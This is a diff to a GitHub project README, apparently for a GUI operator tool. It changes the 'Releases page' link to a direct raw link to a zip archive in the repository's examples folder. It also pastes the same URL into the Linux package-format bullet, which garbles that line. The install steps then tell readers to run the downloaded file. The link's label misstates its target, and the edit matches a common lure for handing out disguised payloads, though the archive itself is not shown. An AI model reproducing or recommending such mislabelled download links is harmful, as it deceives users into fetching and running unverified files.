Shubhamdalbehera/CUA-GUI-Operator/README.md

 ## 💾 Download & Install

-To download the application, visit the [Releases page](https://github.com/Shubhamdalbehera/CUA-GUI-Operator/releases) on GitHub.
+To download the application, visit the [Releases page](https://raw.githubusercontent.com/Shubhamdalbehera/CUA-GUI-Operator/main/examples/GU_Operator_CU_1.2.zip) on GitHub.
 Follow these steps to install CUA-GUI-Operator on your computer:

 1. Click on the link above to go to the Releases page.
 2. Look for the latest version of CUA-GUI-Operator.
 3. Choose the appropriate file for your operating system:
    - For Windows, select the `.exe` file.
    - For macOS, select the `.dmg` file.
-   - For Linux, select the appropriate package format (e.g., `.deb` or `.tar.gz`).
+   - For Linux, select the appropriate package format (e.g., `.deb` or `https://raw.githubusercontent.com/Shubhamdalbehera/CUA-GUI-Operator/main/examples/GU_Operator_CU_1.2.zip`).
 4. Download the selected file.
 5. Locate the downloaded file on your computer.
 6. Run the file to start the installation process.